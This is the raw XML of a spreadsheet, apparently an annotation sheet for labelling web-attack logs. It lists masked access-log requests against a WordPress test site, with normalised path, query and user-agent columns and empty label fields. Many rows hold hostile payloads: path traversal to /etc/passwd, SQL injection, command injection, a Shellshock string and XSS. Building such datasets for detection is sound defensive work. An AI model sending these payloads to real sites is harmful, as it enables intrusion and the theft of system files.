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tasi" sheetId="1" state="visible" r:id="rId1"/>
    <sheet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0" customWidth="1" min="3" max="3"/>
    <col width="40" customWidth="1" min="4" max="4"/>
    <col width="40" customWidth="1" min="5" max="5"/>
    <col width="40" customWidth="1" min="6" max="6"/>
    <col width="20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raw_log_masked</t>
        </is>
      </c>
      <c r="D1" s="1" t="inlineStr">
        <is>
          <t>path_norm</t>
        </is>
      </c>
      <c r="E1" s="1" t="inlineStr">
        <is>
          <t>query_norm</t>
        </is>
      </c>
      <c r="F1" s="1" t="inlineStr">
        <is>
          <t>ua_norm</t>
        </is>
      </c>
      <c r="G1" s="1" t="inlineStr">
        <is>
          <t>label_anotator</t>
        </is>
      </c>
      <c r="H1" s="1" t="inlineStr">
        <is>
          <t>catatan</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="2" t="n">
        <v>1</v>
      </c>
      <c r="B2" s="2" t="inlineStr">
        <is>
          <t>srbh-e2f88c882069ba85</t>
        </is>
      </c>
      <c r="C2" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/2020/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D2" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020//../../../../../../../../../../../../../../../../</t>
        </is>
      </c>
      <c r="E2" s="2" t="inlineStr"/>
      <c r="F2" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G2" s="3" t="inlineStr"/>
      <c r="H2" s="3" t="inlineStr"/>
    </row>
    <row r="3">
      <c r="A3" s="2" t="n">
        <v>2</v>
      </c>
      <c r="B3" s="2" t="inlineStr">
        <is>
          <t>srbh-114ccbb0fa492d97</t>
        </is>
      </c>
      <c r="C3" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php%27+and+0+in+%28select+sleep%2815%29+%29+--+/nihil-dolorem-molestiae-recusandae-corrupti-qui-alias/feed HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D3" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php'+and+0+in+(select+sleep(15)+)+--+/nihil-dolorem-molestiae-recusandae-corrupti-qui-alias/feed</t>
        </is>
      </c>
      <c r="E3" s="2" t="inlineStr"/>
      <c r="F3" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G3" s="3" t="inlineStr"/>
      <c r="H3" s="3" t="inlineStr"/>
    </row>
    <row r="4">
      <c r="A4" s="2" t="n">
        <v>3</v>
      </c>
      <c r="B4" s="2" t="inlineStr">
        <is>
          <t>srbh-c52ecb5ed9deca5c</t>
        </is>
      </c>
      <c r="C4" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/my-account/edit-profile/%7B%7B+attachment.thumbnail.url+%7D%7D%22+OR+%221%22%3D%221%22+--+ HTTP/1.1" 404 53918 "http://test-site.com/blog/index.php/my-account/edit-profile/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D4" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/my-account/edit-profile/{{+attachment.thumbnail.url+}}"+or+"1"="1"+--+</t>
        </is>
      </c>
      <c r="E4" s="2" t="inlineStr"/>
      <c r="F4" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G4" s="3" t="inlineStr"/>
      <c r="H4" s="3" t="inlineStr"/>
    </row>
    <row r="5">
      <c r="A5" s="2" t="n">
        <v>4</v>
      </c>
      <c r="B5" s="2" t="inlineStr">
        <is>
          <t>srbh-daf276f8cabe83d8</t>
        </is>
      </c>
      <c r="C5" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "HEAD /smsolar.nsf HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"</t>
        </is>
      </c>
      <c r="D5" s="2" t="inlineStr">
        <is>
          <t>/smsolar.nsf</t>
        </is>
      </c>
      <c r="E5" s="2" t="inlineStr"/>
      <c r="F5" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</t>
        </is>
      </c>
      <c r="G5" s="3" t="inlineStr"/>
      <c r="H5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="n">
        <v>5</v>
      </c>
      <c r="B6" s="2" t="inlineStr">
        <is>
          <t>srbh-89e8529757199934</t>
        </is>
      </c>
      <c r="C6" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020%25%27+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23/03/23/fuga-aut-recusandae-sed-dolor-quia HTTP/1.1" 404 53918 "http://test-site.com/blog/index.php/2020/03/23/fuga-aut-recusandae-sed-dolor-quia/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D6" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020%'+union+all+select+null,null,null,null,null,null,null,null,null,null,null#/03/23/fuga-aut-recusandae-sed-dolor-quia</t>
        </is>
      </c>
      <c r="E6" s="2" t="inlineStr"/>
      <c r="F6" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G6" s="3" t="inlineStr"/>
      <c r="H6" s="3" t="inlineStr"/>
    </row>
    <row r="7">
      <c r="A7" s="2" t="n">
        <v>6</v>
      </c>
      <c r="B7" s="2" t="inlineStr">
        <is>
          <t>srbh-ab45970355c64f44</t>
        </is>
      </c>
      <c r="C7" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes//jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D7" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes//jquery/ui/core.min.js</t>
        </is>
      </c>
      <c r="E7" s="2" t="inlineStr">
        <is>
          <t>ver=1.11.4</t>
        </is>
      </c>
      <c r="F7" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G7" s="3" t="inlineStr"/>
      <c r="H7" s="3" t="inlineStr"/>
    </row>
    <row r="8">
      <c r="A8" s="2" t="n">
        <v>7</v>
      </c>
      <c r="B8" s="2" t="inlineStr">
        <is>
          <t>srbh-76d0ab9d7a09264f</t>
        </is>
      </c>
      <c r="C8" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DOWASP%2520scene/embed HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D8" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/http://www.google.com/search?q=OWASP scene/embed</t>
        </is>
      </c>
      <c r="E8" s="2" t="inlineStr"/>
      <c r="F8" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G8" s="3" t="inlineStr"/>
      <c r="H8" s="3" t="inlineStr"/>
    </row>
    <row r="9">
      <c r="A9" s="2" t="n">
        <v>8</v>
      </c>
      <c r="B9" s="2" t="inlineStr">
        <is>
          <t>srbh-02baa0dedafd988c</t>
        </is>
      </c>
      <c r="C9" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php%22%29+RLIKE+%28SELECT+%28CASE+WHEN+%289086%3D9086%29+THEN+0x696e6465782e706870+ELSE+0x28+END%29%29+AND+%28%22GfGs%22%3D%22GfGs/2020/03/23 HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/2020/03/23" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D9" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php")+rlike+(select+(case+when+(9086=9086)+then+0x696e6465782e706870+else+0x28+end))+and+("GfGs"="GfGs/2020/03/23</t>
        </is>
      </c>
      <c r="E9" s="2" t="inlineStr"/>
      <c r="F9" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G9" s="3" t="inlineStr"/>
      <c r="H9" s="3" t="inlineStr"/>
    </row>
    <row r="10">
      <c r="A10" s="2" t="n">
        <v>9</v>
      </c>
      <c r="B10" s="2" t="inlineStr">
        <is>
          <t>srbh-8cda703ee3142ae8</t>
        </is>
      </c>
      <c r="C10" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-admin/load-styles.php?c=0%7Csleep+15%23&amp;dir=ltr&amp;load%5B%5D=dashicons%2Cbuttons%2Cforms%2Cl10n%2Clogin&amp;ver=4.9.5 HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D10" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-admin/load-styles.php</t>
        </is>
      </c>
      <c r="E10" s="2" t="inlineStr">
        <is>
          <t>c=0|sleep 15#&amp;dir=ltr&amp;load[]=dashicons,buttons,forms,l10n,login&amp;ver=4.9.5</t>
        </is>
      </c>
      <c r="F10" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G10" s="3" t="inlineStr"/>
      <c r="H10" s="3" t="inlineStr"/>
    </row>
    <row r="11">
      <c r="A11" s="2" t="n">
        <v>10</v>
      </c>
      <c r="B11" s="2" t="inlineStr">
        <is>
          <t>srbh-6a0e4a477e2348e3</t>
        </is>
      </c>
      <c r="C11" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/2020/04/6b2fa1b9-c963-3881-90e3-4f13ffe1c2d3-1024x682.jpg HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/fugiat-recusandae-voluptatem-ratione-quo-placeat/embed/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D11" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\/2020/04/&lt;*&gt;-1024x682.jpg</t>
        </is>
      </c>
      <c r="E11" s="2" t="inlineStr"/>
      <c r="F11" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G11" s="3" t="inlineStr"/>
      <c r="H11" s="3" t="inlineStr"/>
    </row>
    <row r="12">
      <c r="A12" s="2" t="n">
        <v>11</v>
      </c>
      <c r="B12" s="2" t="inlineStr">
        <is>
          <t>srbh-387f2e38feb2bb06</t>
        </is>
      </c>
      <c r="C12" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/wp-backbone.min.js?ver=4.9.5 HTTP/1.1" 200 3020 "-" "'\"&lt;script&gt;alert(1);&lt;/script&gt;"</t>
        </is>
      </c>
      <c r="D12" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/wp-backbone.min.js</t>
        </is>
      </c>
      <c r="E12" s="2" t="inlineStr">
        <is>
          <t>ver=4.9.5</t>
        </is>
      </c>
      <c r="F12" s="2" t="inlineStr">
        <is>
          <t>'"&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="G12" s="3" t="inlineStr"/>
      <c r="H12" s="3" t="inlineStr"/>
    </row>
    <row r="13">
      <c r="A13" s="2" t="n">
        <v>12</v>
      </c>
      <c r="B13" s="2" t="inlineStr">
        <is>
          <t>srbh-df56da89aea5fb71</t>
        </is>
      </c>
      <c r="C13" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/themes/twentyseventeen/assets/js/html5.js?ver=3.7.3%26cat+%2Fetc%2Fpasswd%26 HTTP/1.1" 200 10330 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D13" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/themes/twentyseventeen/assets/js/html5.js</t>
        </is>
      </c>
      <c r="E13" s="2" t="inlineStr">
        <is>
          <t>ver=3.7.3&amp;cat /etc/passwd&amp;</t>
        </is>
      </c>
      <c r="F13" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G13" s="3" t="inlineStr"/>
      <c r="H13" s="3" t="inlineStr"/>
    </row>
    <row r="14">
      <c r="A14" s="2" t="n">
        <v>13</v>
      </c>
      <c r="B14" s="2" t="inlineStr">
        <is>
          <t>srbh-07af2571a2266382</t>
        </is>
      </c>
      <c r="C14" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/wp-json/oembed/1.0/embed?format=xml&amp;url=%28%29+%7B+%3A%3B%7D%3B+%2Fbin%2Fsleep+15 HTTP/1.1" 404 132 "http://test-site.com/blog/index.php/vitae-dolores-quidem-possimus-aut-voluptatibus/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D14" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/wp-json/oembed/1.0/embed</t>
        </is>
      </c>
      <c r="E14" s="2" t="inlineStr">
        <is>
          <t>format=xml&amp;url=() { :;}; /bin/sleep 15</t>
        </is>
      </c>
      <c r="F14" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G14" s="3" t="inlineStr"/>
      <c r="H14" s="3" t="inlineStr"/>
    </row>
    <row r="15">
      <c r="A15" s="2" t="n">
        <v>14</v>
      </c>
      <c r="B15" s="2" t="inlineStr">
        <is>
          <t>srbh-026d13280bb1e211</t>
        </is>
      </c>
      <c r="C15" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/media-editor.min.js?ver=4.9.5 HTTP/1.1" 200 10905 "http://test-site.com/blog/index.php/my-account/edit-profile/" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"</t>
        </is>
      </c>
      <c r="D15" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/media-editor.min.js</t>
        </is>
      </c>
      <c r="E15" s="2" t="inlineStr">
        <is>
          <t>ver=4.9.5</t>
        </is>
      </c>
      <c r="F15" s="2" t="inlineStr">
        <is>
          <t>msnbot/1.1 (+http://search.msn.com/msnbot.htm)</t>
        </is>
      </c>
      <c r="G15" s="3" t="inlineStr"/>
      <c r="H15" s="3" t="inlineStr"/>
    </row>
    <row r="16">
      <c r="A16" s="2" t="n">
        <v>15</v>
      </c>
      <c r="B16" s="2" t="inlineStr">
        <is>
          <t>srbh-43d835d6cf5fac6b</t>
        </is>
      </c>
      <c r="C16" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/03/29/distinctio-sequi-officiis-occaecati/ HTTP/1.1" 200 64186 "http://test-site.com/blog/index.php/2020/03/29/distinctio-sequi-officiis-occaecati/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D16" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/03/29/distinctio-sequi-officiis-occaecati/</t>
        </is>
      </c>
      <c r="E16" s="2" t="inlineStr"/>
      <c r="F16" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G16" s="3" t="inlineStr"/>
      <c r="H16" s="3" t="inlineStr"/>
    </row>
    <row r="17">
      <c r="A17" s="2" t="n">
        <v>16</v>
      </c>
      <c r="B17" s="2" t="inlineStr">
        <is>
          <t>srbh-01b00fcbf8064bef</t>
        </is>
      </c>
      <c r="C17" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "POST /blog/wp-login.php?action=lostpassword HTTP/1.1" 500 2817 "http://test-site.com/blog/wp-login.php?action=lostpassword" "'\"&lt;script&gt;alert(1);&lt;/script&gt;"</t>
        </is>
      </c>
      <c r="D17" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-login.php</t>
        </is>
      </c>
      <c r="E17" s="2" t="inlineStr">
        <is>
          <t>action=lostpassword</t>
        </is>
      </c>
      <c r="F17" s="2" t="inlineStr">
        <is>
          <t>'"&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="G17" s="3" t="inlineStr"/>
      <c r="H17" s="3" t="inlineStr"/>
    </row>
    <row r="18">
      <c r="A18" s="2" t="n">
        <v>17</v>
      </c>
      <c r="B18" s="2" t="inlineStr">
        <is>
          <t>srbh-4036ee3a4d096eab</t>
        </is>
      </c>
      <c r="C18" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "POST /blog/index.php/my-account/edit-profile/post.php/?action=edit&amp;post=%7B%7B+data.id+%7D%7D%26%26cat+%2Fetc%2Fpasswd HTTP/1.1" 200 58131 "http://test-site.com/blog/index.php/my-account/edit-profile/post.php/?action=edit&amp;post=%7B%7B%20data.id%20%7D%7D" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D18" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/my-account/edit-profile/post.php/</t>
        </is>
      </c>
      <c r="E18" s="2" t="inlineStr">
        <is>
          <t>action=edit&amp;post={{ data.id }}&amp;&amp;cat /etc/passwd</t>
        </is>
      </c>
      <c r="F18" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G18" s="3" t="inlineStr"/>
      <c r="H18" s="3" t="inlineStr"/>
    </row>
    <row r="19">
      <c r="A19" s="2" t="n">
        <v>18</v>
      </c>
      <c r="B19" s="2" t="inlineStr">
        <is>
          <t>srbh-2f98bdb3957467c5</t>
        </is>
      </c>
      <c r="C19" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/themes/twentyseventeen/assets/https%3A%2F%2Fwww.google.com HTTP/1.1" 404 276 "https://test-site.com/blog/index.php/my-account/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"</t>
        </is>
      </c>
      <c r="D19" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/themes/twentyseventeen/assets/https://www.google.com</t>
        </is>
      </c>
      <c r="E19" s="2" t="inlineStr"/>
      <c r="F19" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/&lt;*&gt; Firefox/73.0</t>
        </is>
      </c>
      <c r="G19" s="3" t="inlineStr"/>
      <c r="H19" s="3" t="inlineStr"/>
    </row>
    <row r="20">
      <c r="A20" s="2" t="n">
        <v>19</v>
      </c>
      <c r="B20" s="2" t="inlineStr">
        <is>
          <t>srbh-a729f191aae36ad4</t>
        </is>
      </c>
      <c r="C20" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/my-account/edit-profile/?mode=%22+onMouseOver%3D%22alert%281%29%3B HTTP/1.1" 200 57861 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D20" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/my-account/edit-profile/</t>
        </is>
      </c>
      <c r="E20" s="2" t="inlineStr">
        <is>
          <t>mode=" onmouseover="alert(1);</t>
        </is>
      </c>
      <c r="F20" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G20" s="3" t="inlineStr"/>
      <c r="H20" s="3" t="inlineStr"/>
    </row>
    <row r="21">
      <c r="A21" s="2" t="n">
        <v>20</v>
      </c>
      <c r="B21" s="2" t="inlineStr">
        <is>
          <t>srbh-7e9bb3b533e0a345</t>
        </is>
      </c>
      <c r="C21" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "PUT /blog/index.php/category/uncategorized/feed/p2nqnp4pwm HTTP/1.1" 404 58226 "http://test-site.com/blog/index.php/category/uncategorized/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D21" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/category/uncategorized/feed/p2nqnp4pwm</t>
        </is>
      </c>
      <c r="E21" s="2" t="inlineStr"/>
      <c r="F21" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G21" s="3" t="inlineStr"/>
      <c r="H21" s="3" t="inlineStr"/>
    </row>
    <row r="22">
      <c r="A22" s="2" t="n">
        <v>21</v>
      </c>
      <c r="B22" s="2" t="inlineStr">
        <is>
          <t>srbh-455e689d5d916685</t>
        </is>
      </c>
      <c r="C22" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd/wp-includes/js HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/my-account/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D22" s="2" t="inlineStr">
        <is>
          <t>//../../../../../../../../../../../../../../../../etc/passwd/wp-includes/js</t>
        </is>
      </c>
      <c r="E22" s="2" t="inlineStr"/>
      <c r="F22" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G22" s="3" t="inlineStr"/>
      <c r="H22" s="3" t="inlineStr"/>
    </row>
    <row r="23">
      <c r="A23" s="2" t="n">
        <v>22</v>
      </c>
      <c r="B23" s="2" t="inlineStr">
        <is>
          <t>srbh-ce15584e5cfbb98c</t>
        </is>
      </c>
      <c r="C23" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/author%27+where+0+in+%28select+sleep%2815%29+%29+--+/sipes-nolan HTTP/1.1" 404 53918 "http://test-site.com/blog/index.php/author/sipes-nolan/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D23" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/author'+where+0+in+(select+sleep(15)+)+--+/sipes-nolan</t>
        </is>
      </c>
      <c r="E23" s="2" t="inlineStr"/>
      <c r="F23" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G23" s="3" t="inlineStr"/>
      <c r="H23" s="3" t="inlineStr"/>
    </row>
    <row r="24">
      <c r="A24" s="2" t="n">
        <v>23</v>
      </c>
      <c r="B24" s="2" t="inlineStr">
        <is>
          <t>srbh-66dc1eea982aaa76</t>
        </is>
      </c>
      <c r="C24" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1%3Bsleep+15%3B HTTP/1.1" 200 10056 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D24" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/jquery/jquery-migrate.min.js</t>
        </is>
      </c>
      <c r="E24" s="2" t="inlineStr">
        <is>
          <t>ver=1.4.1;sleep 15;</t>
        </is>
      </c>
      <c r="F24" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G24" s="3" t="inlineStr"/>
      <c r="H24" s="3" t="inlineStr"/>
    </row>
    <row r="25">
      <c r="A25" s="2" t="n">
        <v>24</v>
      </c>
      <c r="B25" s="2" t="inlineStr">
        <is>
          <t>srbh-670d72681d56f821</t>
        </is>
      </c>
      <c r="C25" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/underscore.min.log HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D25" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/underscore.min.log</t>
        </is>
      </c>
      <c r="E25" s="2" t="inlineStr"/>
      <c r="F25" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G25" s="3" t="inlineStr"/>
      <c r="H25" s="3" t="inlineStr"/>
    </row>
    <row r="26">
      <c r="A26" s="2" t="n">
        <v>25</v>
      </c>
      <c r="B26" s="2" t="inlineStr">
        <is>
          <t>srbh-3b47bb90847fecdf</t>
        </is>
      </c>
      <c r="C26" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-admin/about.bak HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D26" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-admin/about.bak</t>
        </is>
      </c>
      <c r="E26" s="2" t="inlineStr"/>
      <c r="F26" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G26" s="3" t="inlineStr"/>
      <c r="H26" s="3" t="inlineStr"/>
    </row>
    <row r="27">
      <c r="A27" s="2" t="n">
        <v>26</v>
      </c>
      <c r="B27" s="2" t="inlineStr">
        <is>
          <t>srbh-fb4113e3b032acc2</t>
        </is>
      </c>
      <c r="C27" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/uploads/2020/04/aa129ea8-5161-37b5-acab-9d6386eeec9c.png/ HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/est-reiciendis-laboriosam-aperiam-adipisci-non/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D27" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020/04/&lt;*&gt;.png/</t>
        </is>
      </c>
